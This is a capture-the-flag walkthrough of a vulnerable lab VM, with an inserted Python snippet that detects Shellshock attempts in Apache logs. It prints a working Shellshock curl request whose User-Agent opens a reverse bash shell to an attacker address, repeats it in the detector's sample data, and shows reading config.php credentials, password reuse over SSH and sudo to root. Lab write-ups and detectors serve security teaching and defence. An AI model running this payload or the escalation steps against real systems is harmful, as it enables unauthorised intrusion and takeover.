A scan shows ports 22 and 3128 open, but port 8080 is closed and is an http-proxy.
3128 shows that it’s a Squid proxy, so I set my proxy settings in Firefox to that port.
Going to the IP now shows a website.
A Nikto scan using the proxy settings reveals a few interesting things:
nikto --useproxy 192.168.218.140:3128 -h 192.168.218.140
The most interesting of these is Shellshock.
I also ran it through dirbuster (had to also configure proxy settings) and came up with a few interesting directories but nothing out of the ordinary. I decided to pursue the Shellshock vulnerability first.
curl -x http://192.168.218.140:3128 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.218.129/1234 0>&1" http://192.168.218.140/cgi-bin/status
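For defenders, the request above is easy to spot in the web server's access log, because the header value begins with a bash function definition. The following Python is an added example, not part of the original write-up; it assumes Apache's combined log format, and the sample log lines (client addresses, timestamps, status codes, sizes) are constructed.

```python
import re

# Apache "combined" format (assumed):
# host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED + r'$'
)
# Shellshock trigger: a value bash would parse as a function definition, "() {".
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')

def shellshock_hits(lines):
    """Return one record per log line whose request, Referer or User-Agent holds '() {'."""
    hits = []
    for line in lines:
        m = COMBINED.match(line.strip())
        if not m:
            continue  # not a combined-format line; skip rather than guess
        host, when, request, status, referer, agent = m.groups()
        fields = [name for name, value in
                  (("request", request), ("referer", referer), ("agent", agent))
                  if FUNC_DEF.search(value)]
        if fields:
            parts = request.split()
            hits.append({
                "host": host, "time": when, "status": int(status),
                "path": parts[1] if len(parts) > 1 else "",
                "fields": fields,
            })
    return hits

# Constructed sample lines. A request relayed by a proxy is logged with the
# proxy's address as the client; 127.0.0.1 is an assumption for this sample.
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Oct/2016:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" 200 197 "-" '
    '"() { ignored;};/bin/bash -i >& /dev/tcp/192.168.218.129/1234 0>&1"',
    '127.0.0.1 - - [10/Oct/2016:13:50:02 +0000] "GET / HTTP/1.1" 200 21 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"',
    '127.0.0.1 - - [10/Oct/2016:13:51:10 +0000] "GET /robots.txt HTTP/1.1" 200 45 "-" '
    '"Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"',
    '127.0.0.1 - - [10/Oct/2016:13:56:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 197 '
    '"() { :; }; echo probe" "curl/7.50.1"',
]

if __name__ == "__main__":
    for hit in shellshock_hits(SAMPLE_LOG):
        print(hit["time"], hit["host"], hit["path"], hit["status"], ",".join(hit["fields"]))
```

A hit against a `/cgi-bin/` path with a 200 status is the case to triage first, since the function-definition string only matters when the request reaches a CGI handler that invokes bash.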
Following my privilege escalation Workflowy list, I checked the config.php file located in /var/www/wolfcms and found MySQL credentials.
I try to log in, but it never opens a MySQL prompt.
So back to square one.
I did have a password, john@123, so possibly there was password reuse. I do
cat /etc/passwd
to view the users.
I try the password via SSH with user sickos and it works!
I then check the bash history, which reveals the command sudo su,
which works, and I am now root.
Aside from the MySQL issue, I didn’t run into any other issues with this VM, so I actually enjoyed this one.